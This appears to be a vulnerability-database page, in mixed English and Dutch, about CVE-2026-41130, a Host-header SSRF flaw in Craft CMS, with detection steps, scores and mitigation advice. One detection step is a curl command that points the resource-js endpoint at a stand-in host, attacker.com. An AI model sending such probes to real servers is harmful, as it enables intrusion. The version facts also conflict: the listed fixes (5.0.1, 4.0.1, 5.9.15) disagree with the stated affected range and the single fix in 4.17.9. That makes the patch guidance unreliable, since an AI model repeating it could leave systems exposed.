Platform
php
Component
craftcms
Opgelost in
5.0.1
4.0.1
5.9.15
CVE-2026-41130 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Craft CMS. This flaw allows unauthenticated attackers to proxy remote JavaScript resources by manipulating the Host header. The vulnerability impacts versions 4.0.0-RC1 through 5.9.14, and a fix is available in version 4.17.9.
The SSRF vulnerability in Craft CMS arises from the application's trust of the client-supplied Host header when determining the baseUrl used in prefix validation within the actionResourceJs() function. Without explicit restrictions on trustedHosts, an attacker can craft a malicious Host header, effectively controlling the HTTP requests made by the server. This enables the attacker to initiate arbitrary HTTP requests to internal or external resources, potentially exposing sensitive data or interacting with internal services that should not be directly accessible from the internet. The impact is amplified if the server has access to sensitive internal resources or APIs.
CVE-2026-41130 was publicly disclosed on 2026-04-21. There is no indication of active exploitation campaigns at this time. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is not yet widely available, but the vulnerability's nature makes it likely that such code will emerge.
Craft CMS installations running versions 4.0.0-RC1 through 5.9.14 are at risk. This includes deployments using the default configuration where trustedHosts is not explicitly restricted. Shared hosting environments running Craft CMS are particularly vulnerable due to the potential for cross-tenant exploitation.
• php / server:
grep -r 'actionResourceJs()' /path/to/craft-cms/app/controllers/AppController.php• generic web:
curl -I https://your-craft-cms-site.com/resource-js?resource=https://attacker.comExamine the response headers for unexpected Content-Security-Policy directives or other anomalies.
• generic web:
Review Craft CMS access and error logs for requests to unusual or unexpected domains via the resource-js endpoint.
disclosure
Exploit Status
EPSS
0.05% (14% percentiel)
CISA SSVC
The primary mitigation for CVE-2026-41130 is to upgrade Craft CMS to version 4.17.9 or later. Prior to upgrading, carefully review the release notes for any breaking changes that might impact your application's functionality. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains. This limits the server's ability to proxy requests to unauthorized locations. Monitor server logs for unusual outbound HTTP requests originating from the resource-js endpoint. Consider implementing a Web Application Firewall (WAF) with rules to block requests with suspicious Host headers.
Werk Craft CMS bij naar versie 4.17.9 of hoger, of naar versie 5.9.15 of hoger. Deze update corrigeert de kwetsbaarheid van ininjectie van de Host header die sitevervalsingaanvallen (SSRF) mogelijk maakt door het vertrouwen in de door de client geleverde Host header te beperken.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2026-41130 is a Server-Side Request Forgery (SSRF) vulnerability in Craft CMS that allows attackers to proxy remote JavaScript resources by manipulating the Host header.
You are affected if you are running Craft CMS versions 4.0.0-RC1 through 5.9.14 and have not explicitly restricted the trustedHosts configuration.
Upgrade Craft CMS to version 4.17.9 or later. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains.
There is currently no indication of active exploitation campaigns, but the vulnerability's nature makes it likely that exploitation will occur.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/advisories](https://craftcms.com/security/advisories)
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.